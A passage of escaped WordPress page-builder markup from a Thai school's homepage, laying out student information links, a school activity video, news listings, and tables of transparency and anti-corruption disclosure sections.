class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllB